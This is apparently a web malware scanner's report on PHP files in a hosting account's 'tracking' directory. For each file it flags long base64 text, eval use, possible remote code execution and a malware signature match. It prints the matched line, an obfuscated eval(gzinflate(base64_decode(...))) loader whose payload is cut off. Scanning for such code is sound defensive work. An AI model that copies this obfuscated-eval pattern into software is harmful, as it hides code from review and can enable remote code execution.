DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAM1a/3caNxL/uX7P/8NEcQu8GhbbcS7FQOrYXOs7N/FL3PTaXB5P7AqQrV1tJa0xzcv/fiNpFxYMjpOWeyVfDNrRaDTzmZmPhLe3FPs944r1ZRKyaoUnocgiFmSGi0Y6Tiu1o+0tzbTmMulrQ5Wp2pHtrSC4UKwuJI3gZMzCa729xYdQfcS1Zqa603/Te/Pm7NXLd5VMM9XnUeV9rQYftrcAX2NGI6aq5FyG1KDiFgg54oldj1jtVobdcoNvP3q1JX0pUzF39lTeQxv2Zlqfd7e32jpUPDVgpinrEMNuTXBFb6gfJV0vSAXDbVR+lRmENPlvxQANQ9wimDHXkNIRqxRWTHgSyUlD5IZCBwiOsFtnKsq0A6/aLv0cx5Zt17HmSe6xHXSfYaji+53+xas3l+8qbqDy3j3lw2ruuhe9y+MafPMNytm30Ol0wKiM1bzynZgmfMi0yZSw9oyNSVtBIHjIEs0aEzbY09Mk4t7...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM1a/3caNxL/uX7P/8NEcQu8GhbbcS7FQOrYXOs7N/FL3PTaXB5P7AqQrV1tJa0xzcv/fiNpFxYMjpOWeyVfDNrRaDTzmZmPhLe3FPs944r1ZRKyaoUnocgiFmSGi0Y6Tiu1o+0tzbTmMulrQ5Wp2pHtrSC4UKwuJI3gZMzCa729xYdQfcS1Zqa603/Te/Pm7NXLd5VMM9XnUeV9rQYftrcAX2NGI6aq5FyG1KDiFgg54oldj1jtVobdcoNvP3q1JX0pUzF39lTeQxv2Zlqfd7e32jpUPDVgpinrEMNuTXBFb6gfJV0vSAXDbVR+lRmENPlvxQANQ9wimDHXkNIRqxRWTHgSyUlD5IZCBwiOsFtnKsq0A6/aLv0cx5Zt17HmSe6xHXSfYaji+53+xas3l+8qbqDy3j3lw2ruuhe9y+MafPMNytm30Ol0wKiM1bzynZg...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM1a/3caNxL/uX7P/8NEcQu8GhbbcS7FQOrYXOs7N/FL3PTaXB5P7AqQrV1tJa0xzcv/fiNpFxYMjpOWeyVfDNrRaDTzmZmPhLe3FPs944r1ZRKyaoUnocgiFmSGi0Y6Tiu1o+0tzbTmMulrQ5Wp2pHtrSC4UKwuJI3gZMzCa729xYdQfcS1Zqa603/Te/Pm7NXLd5VMM9XnUeV9rQYftrcAX2NGI6aq5FyG1KDiFgg54oldj1jtVobdcoNvP3q1JX0pUzF39lTeQxv2Zlqfd7e32jpUPDVgpinrEMNuTXBFb6gfJV0vSAXDbVR+lRmENPlvxQANQ9wimDHXkNIRqxRWTHgSyUlD5IZCBwiOsFtnKsq0A6/aLv0cx5Zt17HmSe6xHXSfYaji+53+xas3l+8qbqDy3j3lw2ruuhe9y+MafPMNytm30Ol0wKiM1bzynZg...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/call_report.php

Size: 14.06 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19bXfbNrLw5+45+x8QRq2ojd7sJmkqW0pdx23zPGncGzvZu+v46FAiZLGhSC1J2XHa/Pc7gxcSJMEXKXaSbsTdthYxGAwGg8HMYAD+/W8hDUPH98ZhZAWR2dr7+98aS+uCkiExppbrjgO69IPIgPcB/c/KCejY96bUbDre1F3ZtLeKHLe7nC+brUKQ36wLx7MiaCUGhFbsCbTh0Svy5EfW7IXrTyyXNF4cHR6/ePL0+c8n8NKZmT80xidHJydPj5+fNZc0WDiM3uY52Sc7rb//jcDTmPqLpeU5NASUgLgzuqDRgeseytc/+cHLkAamgmoFv8eO3TzHtqkb0pqoTE5+D3tFySsrcKyJS0PokMCI9TTNIGNtJ1y61rXgKQDOLGhY4gtox/UtmxzO6fRNyPp+BzpLIz3Z0Pc/OM1zatnQOeOZP2VcHhDXB44jsx+7VhiNV4E7NLrwb+pNfZua4aMx9Go8XQUB9aLxFZ3...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbNrLw5+45+x8QRq2ojd7sJmkqW0pdx23zPGncGzvZu+v46FAiZLGhSC1J2XHa/Pc7gxcSJMEXKXaSbsTdthYxGAwGg8HMYAD+/W8hDUPH98ZhZAWR2dr7+98aS+uCkiExppbrjgO69IPIgPcB/c/KCejY96bUbDre1F3ZtLeKHLe7nC+brUKQ36wLx7MiaCUGhFbsCbTh0Svy5EfW7IXrTyyXNF4cHR6/ePL0+c8n8NKZmT80xidHJydPj5+fNZc0WDiM3uY52Sc7rb//jcDTmPqLpeU5NASUgLgzuqDRgeseytc/+cHLkAamgmoFv8eO3TzHtqkb0pqoTE5+D3tFySsrcKyJS0PokMCI9TTNIGNtJ1y61rXgKQDOLGhY4gtox/UtmxzO6fRNyPp+BzpLIz3Z0Pc/OM1zatnQOeOZP2VcHhDXB44jsx+7Vhi...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19bXfbNrLw5+45+x8QRq2ojd7sJmkqW0pdx23zPGncGzvZu+v46FAiZLGhSC1J2XHa/Pc7gxcSJMEXKXaSbsTdthYxGAwGg8HMYAD+/W8hDUPH98ZhZAWR2dr7+98aS+uCkiExppbrjgO69IPIgPcB/c/KCejY96bUbDre1F3ZtLeKHLe7nC+brUKQ36wLx7MiaCUGhFbsCbTh0Svy5EfW7IXrTyyXNF4cHR6/ePL0+c8n8NKZmT80xidHJydPj5+fNZc0WDiM3uY52Sc7rb//jcDTmPqLpeU5NASUgLgzuqDRgeseytc/+cHLkAamgmoFv8eO3TzHtqkb0pqoTE5+D3tFySsrcKyJS0PokMCI9TTNIGNtJ1y61rXgKQDOLGhY4gtox/UtmxzO6fRNyPp+BzpLIz3Z0Pc/OM1zatnQOeOZP2VcHhDXB44jsx+7Vhi...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/manage_users.php

Size: 2.69 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1Yf3PaOBP++zLDd9iouZrMHCb03uTagGk58HvNTfNjAn3vOknGI2wBugrbry2HZG7y3W8l2WCI4TptSdpgabXSPrv7aNe1vWazP2P+Z5hECfhROOFT267t8Ul9f8IF89gDT2VaJzz0RRawZi4Sz2JyeFjb+7u2B/gJOKuTzrg7mrGEAU+BhsCSJEps6OsFoJRBGEncJwsDG64EoymDhDV4mEoqBJj9JfUlpFkcR4m0O81xlxy2a3tPtb2UpSmPQg+FE1lXgwn7f8YT5kWhz+pWccBMcqGOZymRg5hOGThAaDDnoXogajQY41jIFjD4VWs6yFKWeD6eTOIETje6UyY/4mBfja1k0tJ0TwglkerZGuJ4hcaIiAagAU0NiDxNmawfeEN3ODy7vLix9FY8sO5K8M0YDVhSJx8in0o08hRENOWhQbltZNAR0iCBakv6YpbMuYbGuuu0DiFX+bZb2+ukfsJjCfIxZg6R7EE...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1Yf3PaOBP++zLDd9iouZrMHCb03uTagGk58HvNTfNjAn3vOknGI2wBugrbry2HZG7y3W8l2WCI4TptSdpgabXSPrv7aNe1vWazP2P+Z5hECfhROOFT267t8Ul9f8IF89gDT2VaJzz0RRawZi4Sz2JyeFjb+7u2B/gJOKuTzrg7mrGEAU+BhsCSJEps6OsFoJRBGEncJwsDG64EoymDhDV4mEoqBJj9JfUlpFkcR4m0O81xlxy2a3tPtb2UpSmPQg+FE1lXgwn7f8YT5kWhz+pWccBMcqGOZymRg5hOGThAaDDnoXogajQY41jIFjD4VWs6yFKWeD6eTOIETje6UyY/4mBfja1k0tJ0TwglkerZGuJ4hcaIiAagAU0NiDxNmawfeEN3ODy7vLix9FY8sO5K8M0YDVhSJx8in0o08hRENOWhQbltZNAR0iCBakv6Ypb...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1Yf3PaOBP++zLDd9iouZrMHCb03uTagGk58HvNTfNjAn3vOknGI2wBugrbry2HZG7y3W8l2WCI4TptSdpgabXSPrv7aNe1vWazP2P+Z5hECfhROOFT267t8Ul9f8IF89gDT2VaJzz0RRawZi4Sz2JyeFjb+7u2B/gJOKuTzrg7mrGEAU+BhsCSJEps6OsFoJRBGEncJwsDG64EoymDhDV4mEoqBJj9JfUlpFkcR4m0O81xlxy2a3tPtb2UpSmPQg+FE1lXgwn7f8YT5kWhz+pWccBMcqGOZymRg5hOGThAaDDnoXogajQY41jIFjD4VWs6yFKWeD6eTOIETje6UyY/4mBfja1k0tJ0TwglkerZGuJ4hcaIiAagAU0NiDxNmawfeEN3ODy7vLix9FY8sO5K8M0YDVhSJx8in0o08hRENOWhQbltZNAR0iCBakv6Ypb...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/call_report_outgoing.php

Size: 14.23 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19a3vbtpLw57fP0/+AMG5InehmN2lT2VLq2m6bfdK4azs97zmOV0uRkMWGInVIype0+e+LwYUESfAmK5fW4m5zLBIYDAaDwdwAfPlFiMPQ8b1xGJlBZLR2v/xia2FeYjREmmW67jjACz+INPI+wP9ZOgEe+56FDd3xLHdp494yctzuYrbQW4VFfjUvHc+MSCtxQdKKPSFtePgaHf5Am710/Ynpoq2To4Pjk8MXr346JS+dqfH91vj06PT0xfGrc32Bg7lD8dUv0B7abn35BSLPluXPF6bn4JCAJIA7o0sc7bvugXj9ox+8DnFgSKCW5PfYsfULaBu7Ia4JymDo96BXGP1mBo45cXFIOsQhQj1FM0BY2wkXrnnLaUoKTk3SsIAX4I7rmzY6mGHrbUj7/oB0FkdqtEnf/2A4z7Bpk85pL32LUnmAXJ9QHIj93DXDaLwM3KHWJf9iz/JtbITPxqRXY2sZBNiLxtd4AkN...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19a3vbtpLw57fP0/+AMG5InehmN2lT2VLq2m6bfdK4azs97zmOV0uRkMWGInVIype0+e+LwYUESfAmK5fW4m5zLBIYDAaDwdwAfPlFiMPQ8b1xGJlBZLR2v/xia2FeYjREmmW67jjACz+INPI+wP9ZOgEe+56FDd3xLHdp494yctzuYrbQW4VFfjUvHc+MSCtxQdKKPSFtePgaHf5Am710/Ynpoq2To4Pjk8MXr346JS+dqfH91vj06PT0xfGrc32Bg7lD8dUv0B7abn35BSLPluXPF6bn4JCAJIA7o0sc7bvugXj9ox+8DnFgSKCW5PfYsfULaBu7Ia4JymDo96BXGP1mBo45cXFIOsQhQj1FM0BY2wkXrnnLaUoKTk3SsIAX4I7rmzY6mGHrbUj7/oB0FkdqtEnf/2A4z7Bpk85pL32LUnmAXJ9QHIj93DXDaLw...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19a3vbtpLw57fP0/+AMG5InehmN2lT2VLq2m6bfdK4azs97zmOV0uRkMWGInVIype0+e+LwYUESfAmK5fW4m5zLBIYDAaDwdwAfPlFiMPQ8b1xGJlBZLR2v/xia2FeYjREmmW67jjACz+INPI+wP9ZOgEe+56FDd3xLHdp494yctzuYrbQW4VFfjUvHc+MSCtxQdKKPSFtePgaHf5Am710/Ynpoq2To4Pjk8MXr346JS+dqfH91vj06PT0xfGrc32Bg7lD8dUv0B7abn35BSLPluXPF6bn4JCAJIA7o0sc7bvugXj9ox+8DnFgSKCW5PfYsfULaBu7Ia4JymDo96BXGP1mBo45cXFIOsQhQj1FM0BY2wkXrnnLaUoKTk3SsIAX4I7rmzY6mGHrbUj7/oB0FkdqtEnf/2A4z7Bpk85pL32LUnmAXJ9QHIj93DXDaLw...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/message_menu.php

Size: 743.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI1TUWvbMBB+TiD/4RBhliFJlz52OGWjZU972Jo9jDGCYl1tgSx5kpw0rP3vlWTHbpuVFj/Ikr7v7vvuTpPxZGzwbyMMbrTKkSZC5bLheJZrdSuKRV3WSfrpNRDfvgG4QbMTOdqz9V5IoXv0lG8hA4V7uPpCw0H4xC1Q64xERaebH9fff17frH8neOdQJX/S9N9kPJrGXXZ67UM8AEqLEGEGba2V37VJjjI2rYywVDLmHaDzlWUHSj4rQGO0AZ3njUEOQoErEXbaB6iYkGAP1mFFIpsLpEGzUEUKfahw9fC6oytRCGd7SzxuvdL/QEKOEKQHZbCE+3t4sj9Po+XRtEJrWYExEt/OVwW6b90Rbes263lzWEb9o6nUOXNCK88ix/8LkMJ7VKFdl13F4/LhmCMjgTxaQBPM5ZojFVUtw0pmZNZrSdssJTKOhvbJ2lO8E65twpPW+RaH8mfONBivulK+y97HOFu+45vKFgG...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1TUWvbMBB+TiD/4RBhliFJlz52OGWjZU972Jo9jDGCYl1tgSx5kpw0rP3vlWTHbpuVFj/Ikr7v7vvuTpPxZGzwbyMMbrTKkSZC5bLheJZrdSuKRV3WSfrpNRDfvgG4QbMTOdqz9V5IoXv0lG8hA4V7uPpCw0H4xC1Q64xERaebH9fff17frH8neOdQJX/S9N9kPJrGXXZ67UM8AEqLEGEGba2V37VJjjI2rYywVDLmHaDzlWUHSj4rQGO0AZ3njUEOQoErEXbaB6iYkGAP1mFFIpsLpEGzUEUKfahw9fC6oytRCGd7SzxuvdL/QEKOEKQHZbCE+3t4sj9Po+XRtEJrWYExEt/OVwW6b90Rbes263lzWEb9o6nUOXNCK88ix/8LkMJ7VKFdl13F4/LhmCMjgTxaQBPM5ZojFVUtw0pmZNZrSdssJTKOhvbJ2lO8E65...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1TUWvbMBB+TiD/4RBhliFJlz52OGWjZU972Jo9jDGCYl1tgSx5kpw0rP3vlWTHbpuVFj/Ikr7v7vvuTpPxZGzwbyMMbrTKkSZC5bLheJZrdSuKRV3WSfrpNRDfvgG4QbMTOdqz9V5IoXv0lG8hA4V7uPpCw0H4xC1Q64xERaebH9fff17frH8neOdQJX/S9N9kPJrGXXZ67UM8AEqLEGEGba2V37VJjjI2rYywVDLmHaDzlWUHSj4rQGO0AZ3njUEOQoErEXbaB6iYkGAP1mFFIpsLpEGzUEUKfahw9fC6oytRCGd7SzxuvdL/QEKOEKQHZbCE+3t4sj9Po+XRtEJrWYExEt/OVwW6b90Rbes263lzWEb9o6nUOXNCK88ix/8LkMJ7VKFdl13F4/LhmCMjgTxaQBPM5ZojFVUtw0pmZNZrSdssJTKOhvbJ2lO8E65...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/call_report_review.php

Size: 7.78 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09aXPbxpKfX6ryH8ZjxQQTHpJzPK8k0pElOlY9RfKKlHf9ZBULBIbkRCDAB4CSGEf/fbvnwEHiImO7slVBLhPo6e7p6elrGsjXXwUsCLjnDoPQ9EOjfvD1Vztzc8JIh1DLdJyhz+aeH1K477P/LLjPhp5rMaPGXctZ2Ky9CLnTmk/ntXouyFtzwl0zBCrZgFQD2qOW5XDmhghHi+G82dx0l+WA3L3zuMUiQJifPYLZueyenLwSE5443sh0yM5l7/ji8uT0/Jc+3ORj4+edYb/X759enF/X5syfcSGp2g05JHv1r78icO1IPjgLACUgbnYnLDxynGN9+7XnXwXMNxKoFvB7yO3aDdJmTsAqojIk+22UJyPvTJ+bI4cFMCGFEcdlkMEltXkwd8ylWk0AHJtAWOPzWdPxTJscT5l1G4i5P4HJsjCbbZj7R8nzlJk2TI6eeZZY333ieLDWkbARhj3wEP74qEX6S29wXQs...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09aXPbxpKfX6ryH8ZjxQQTHpJzPK8k0pElOlY9RfKKlHf9ZBULBIbkRCDAB4CSGEf/fbvnwEHiImO7slVBLhPo6e7p6elrGsjXXwUsCLjnDoPQ9EOjfvD1Vztzc8JIh1DLdJyhz+aeH1K477P/LLjPhp5rMaPGXctZ2Ky9CLnTmk/ntXouyFtzwl0zBCrZgFQD2qOW5XDmhghHi+G82dx0l+WA3L3zuMUiQJifPYLZueyenLwSE5443sh0yM5l7/ji8uT0/Jc+3ORj4+edYb/X759enF/X5syfcSGp2g05JHv1r78icO1IPjgLACUgbnYnLDxynGN9+7XnXwXMNxKoFvB7yO3aDdJmTsAqojIk+22UJyPvTJ+bI4cFMCGFEcdlkMEltXkwd8ylWk0AHJtAWOPzWdPxTJscT5l1G4i5P4HJsjCbbZj7R8nzlJk2TI6...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09aXPbxpKfX6ryH8ZjxQQTHpJzPK8k0pElOlY9RfKKlHf9ZBULBIbkRCDAB4CSGEf/fbvnwEHiImO7slVBLhPo6e7p6elrGsjXXwUsCLjnDoPQ9EOjfvD1Vztzc8JIh1DLdJyhz+aeH1K477P/LLjPhp5rMaPGXctZ2Ky9CLnTmk/ntXouyFtzwl0zBCrZgFQD2qOW5XDmhghHi+G82dx0l+WA3L3zuMUiQJifPYLZueyenLwSE5443sh0yM5l7/ji8uT0/Jc+3ORj4+edYb/X759enF/X5syfcSGp2g05JHv1r78icO1IPjgLACUgbnYnLDxynGN9+7XnXwXMNxKoFvB7yO3aDdJmTsAqojIk+22UJyPvTJ+bI4cFMCGFEcdlkMEltXkwd8ylWk0AHJtAWOPzWdPxTJscT5l1G4i5P4HJsjCbbZj7R8nzlJk2TI6...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/call_sync.php

Size: 2.09 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOVYe2/bNhD/2wb8HVjBqKTWtpqsLTBn9prV7gPoY0ucDlsaCLTE2Nxk0aOopkGR7747Uk9bdoJ2wDAsQFHreHc83v3uQXba3oMHnTZ5QI5TtRRySD7wOL7WlAlVbEgOvcOn3sGhpjynUUROr+NgQGZLnpArDt8JfJMAVhJyKcWKKKByQXic8JARtWQkpIrOacIGqMTrtDttzyOnTCkeLxLikddxEKUhSzptvoiFZH6aMOnTuZDKUTJl7lGnnTDlK75ifsRXXDmPkMZj7gPdsVf0s88+syBVXMSaze6R/gHySPZXykGliAPm2Nzs5AFjNFgv17ZRnSQodyW5Yn4QiYQ5SO+GczIiMbsik580AUgRTYwdsALr/fGCqQ9UOhY6wEdX+AWLpZUocFQuoXWBV2fw6VixuCJ98jik11avuvK7iGH1bPbccs2u/NLhCR60659Mfzmbns7O7URRqewLl9y/T7bJ5N6IWJb7BRw...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVYe2/bNhD/2wb8HVjBqKTWtpqsLTBn9prV7gPoY0ucDlsaCLTE2Nxk0aOopkGR7747Uk9bdoJ2wDAsQFHreHc83v3uQXba3oMHnTZ5QI5TtRRySD7wOL7WlAlVbEgOvcOn3sGhpjynUUROr+NgQGZLnpArDt8JfJMAVhJyKcWKKKByQXic8JARtWQkpIrOacIGqMTrtDttzyOnTCkeLxLikddxEKUhSzptvoiFZH6aMOnTuZDKUTJl7lGnnTDlK75ifsRXXDmPkMZj7gPdsVf0s88+syBVXMSaze6R/gHySPZXykGliAPm2Nzs5AFjNFgv17ZRnSQodyW5Yn4QiYQ5SO+GczIiMbsik580AUgRTYwdsALr/fGCqQ9UOhY6wEdX+AWLpZUocFQuoXWBV2fw6VixuCJ98jik11avuvK7iGH1bPbccs2u/NLhCR60659...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVYe2/bNhD/2wb8HVjBqKTWtpqsLTBn9prV7gPoY0ucDlsaCLTE2Nxk0aOopkGR7747Uk9bdoJ2wDAsQFHreHc83v3uQXba3oMHnTZ5QI5TtRRySD7wOL7WlAlVbEgOvcOn3sGhpjynUUROr+NgQGZLnpArDt8JfJMAVhJyKcWKKKByQXic8JARtWQkpIrOacIGqMTrtDttzyOnTCkeLxLikddxEKUhSzptvoiFZH6aMOnTuZDKUTJl7lGnnTDlK75ifsRXXDmPkMZj7gPdsVf0s88+syBVXMSaze6R/gHySPZXykGliAPm2Nzs5AFjNFgv17ZRnSQodyW5Yn4QiYQ5SO+GczIiMbsik580AUgRTYwdsALr/fGCqQ9UOhY6wEdX+AWLpZUocFQuoXWBV2fw6VixuCJ98jik11avuvK7iGH1bPbccs2u/NLhCR60659...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/callback.php

Size: 707.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJ1TXWvbMBR9D+Q/aCJENjhO2328rPbGaAt7Wrd4fRnByPJtI1AkT5ZjutH/vit/pA6UDeY8OBzfc3Tu8fF8Np/J+0DWNbhgkX+7/vr9epP9YHtwO1OybUiWS/ICniSUC5crofKmKmn4ez4jeFn42UgLudECAiq1UE0Ja2H0vXyIq11Fw/d/GyyLk6FFWZCEaGjJ1afAgwPMrTiAxUeNrsFKruQvCApew7s3eQnClBAgdZU+gLvjNqD9PA3Do3CPrFIlUOXi7Oz84vXb50NXaX3KjAZx0J3486GDUK985PfmRgtX3HHPvwNbS6OD0UQpcfPLykJK48pK7XIb9OTI2QbCmF6uu6ee8OTl/W8IjtB4Paa2AXuQAup11kolTRchUhYW6spgQkOG41jej/nbXk3ncG3+GLBbBeiWtFw60u6kwr9A8BVqEI48miZmEeHW+tGDQUGWpKw1e67ZkAL26eOkMoIrhYFhaV4llIb...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1TXWvbMBR9D+Q/aCJENjhO2328rPbGaAt7Wrd4fRnByPJtI1AkT5ZjutH/vit/pA6UDeY8OBzfc3Tu8fF8Np/J+0DWNbhgkX+7/vr9epP9YHtwO1OybUiWS/ICniSUC5crofKmKmn4ez4jeFn42UgLudECAiq1UE0Ja2H0vXyIq11Fw/d/GyyLk6FFWZCEaGjJ1afAgwPMrTiAxUeNrsFKruQvCApew7s3eQnClBAgdZU+gLvjNqD9PA3Do3CPrFIlUOXi7Oz84vXb50NXaX3KjAZx0J3486GDUK985PfmRgtX3HHPvwNbS6OD0UQpcfPLykJK48pK7XIb9OTI2QbCmF6uu6ee8OTl/W8IjtB4Paa2AXuQAup11kolTRchUhYW6spgQkOG41jej/nbXk3ncG3+GLBbBeiWtFw60u6kwr9A8BVqEI48miZmEeHW+tG...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1TXWvbMBR9D+Q/aCJENjhO2328rPbGaAt7Wrd4fRnByPJtI1AkT5ZjutH/vit/pA6UDeY8OBzfc3Tu8fF8Np/J+0DWNbhgkX+7/vr9epP9YHtwO1OybUiWS/ICniSUC5crofKmKmn4ez4jeFn42UgLudECAiq1UE0Ja2H0vXyIq11Fw/d/GyyLk6FFWZCEaGjJ1afAgwPMrTiAxUeNrsFKruQvCApew7s3eQnClBAgdZU+gLvjNqD9PA3Do3CPrFIlUOXi7Oz84vXb50NXaX3KjAZx0J3486GDUK985PfmRgtX3HHPvwNbS6OD0UQpcfPLykJK48pK7XIb9OTI2QbCmF6uu6ee8OTl/W8IjtB4Paa2AXuQAup11kolTRchUhYW6spgQkOG41jej/nbXk3ncG3+GLBbBeiWtFw60u6kwr9A8BVqEI48miZmEeHW+tG...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/page_template.php

Size: 5.61 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09/XPbNrI/62buf0DVuc7dG1uyJNuxW1nvuYl7l07S5tVJ+/pubjIgCUlISIIBQTm+uT/+dgGQBD9kUf5InBtdL5YILHYX+w0QFKdfPfv56evfX12QpYrC2R//MMVPEtJ4cdZncR9asI3RQH/rTSOmKMCqZJ99yPjqrP9/+2/O95+KKKGKeyHrE1/EisXqrP/84uwiWEDLcN3YpwZ0//V14g5U7KMaIh/fEX9JZcrUWabm+ycGUw9RKa5CNjsPIh5nKfnm69PjJ6ffkVd0waZD06cBCfxvmqrrkBEFNCxqP037JGIBp2d9GoY4yV7vf3iUCKlIJsM/9wFiqIcNEPYv37UCvPuQMXk9uLpO+dX14ibIOfWZJz7eBLLiaUZD/s8bKQZUsbc8TjJVQOkZGl5z2Xy1v/93PiehIs8vyMk/Zh0E0KDEcz5y3NOv/s7igM//sb9vbGJYGEX+39QTwXXORMBXhAdn/WUY9G2...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbNrI/62buf0DVuc7dG1uyJNuxW1nvuYl7l07S5tVJ+/pubjIgCUlISIIBQTm+uT/+dgGQBD9kUf5InBtdL5YILHYX+w0QFKdfPfv56evfX12QpYrC2R//MMVPEtJ4cdZncR9asI3RQH/rTSOmKMCqZJ99yPjqrP9/+2/O95+KKKGKeyHrE1/EisXqrP/84uwiWEDLcN3YpwZ0//V14g5U7KMaIh/fEX9JZcrUWabm+ycGUw9RKa5CNjsPIh5nKfnm69PjJ6ffkVd0waZD06cBCfxvmqrrkBEFNCxqP037JGIBp2d9GoY4yV7vf3iUCKlIJsM/9wFiqIcNEPYv37UCvPuQMXk9uLpO+dX14ibIOfWZJz7eBLLiaUZD/s8bKQZUsbc8TjJVQOkZGl5z2Xy1v/93PiehIs8vyMk/Zh0E0KDEcz5y3NOv/s7igM/...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

